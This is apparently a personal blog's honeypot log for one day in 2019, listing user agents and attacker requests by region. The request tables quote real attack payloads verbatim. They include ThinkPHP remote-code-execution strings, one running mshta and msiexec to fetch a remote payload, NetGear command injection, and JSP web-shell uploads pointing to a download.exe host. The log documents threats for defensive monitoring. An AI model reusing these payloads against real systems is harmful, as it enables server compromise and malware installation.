コンニチハレバレトシタアオゾラ

With nothing better to do, I spend the whole day facing my blog, jotting down at random whatever trifles drift through my mind,

2019/10/06 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2019/10/06.

Highlights
Region:AP

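The following were observed:
Access attempts targeting a vulnerability in NetGear products
Access attempts targeting a ThinkPHP vulnerability
Scanning for phpMyAdmin
Gh0stRAT-like behavior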

Region:US

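The following were observed:
Access attempts targeting a vulnerability in HiSilicon DVR Devices
Access attempts targeting a ThinkPHP vulnerability
Access attempts targeting JSP files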

Region:EU

The following were observed:
Access attempts targeting a ThinkPHP vulnerability

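Access count trend

AP: total accesses: 40 (change from previous day: -8)
US: total accesses: 129 (change from previous day: +109)
EU: total accesses: 19 (change from previous day: -16)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.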

Region:AP

Source IP address list


User-Agent list

Count UserAgent
2 -
2 curl/7.55.1
2 Go-http-client/1.1
3 Hi
21 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
2 Mozilla/5.0
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
6 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

Request list

Count Method Request Protocol
1 GET /index.php HTTP/1.1
1 GET /LoginPage.do HTTP/1.1
3 GET /Pages/login.htm HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
10 GET /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1
10 GET /?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op[.]Cnazb[.]Xyz/PHP2.jpg%20/Q)\",0)(window.close)
2 GET /TP/index.php HTTP/1.1
2 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /webdav/ HTTP/1.1
1 Gh0st\xad
2 POST /images.php HTTP/1.1
2 POST /TP/index.php?s=captcha HTTP/1.1
1 PROPFIND / HTTP/1.1

Region:US

Source IP address list


User-Agent list

Count UserAgent
2 -
1 Go-http-client/1.1
6 Hi
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
4 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)
4 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

Request list

Count Method Request Protocol
1 -
1 GET /elrekt.php HTTP/1.1
1 GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET http://www[.]google[.]com/ HTTP/1.0
1 GET /index.php HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET ../../mnt/custom/ProductDefinition HTTP
6 GET /Pages/login.htm HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /public/index.php HTTP/1.1
4 GET /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 HEAD /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 PUT /FxCodeShell.jsp%20 HTTP/1.1
1 PUT /FxCodeShell.jsp::$DATA HTTP/1.1
1 PUT /FxCodeShell.jsp/ HTTP/1.1

Region:EU

Source IP address list


User-Agent list

Count UserAgent
1 -
1 curl/7.55.1
1 Go-http-client/1.1
3 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 python-requests/2.22.0

Request list

Count Method Request Protocol
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
2 GET /index.php HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /phpmyadmin HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /public/index.php HTTP/1.1
3 GET /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 POST /images.php HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 \x03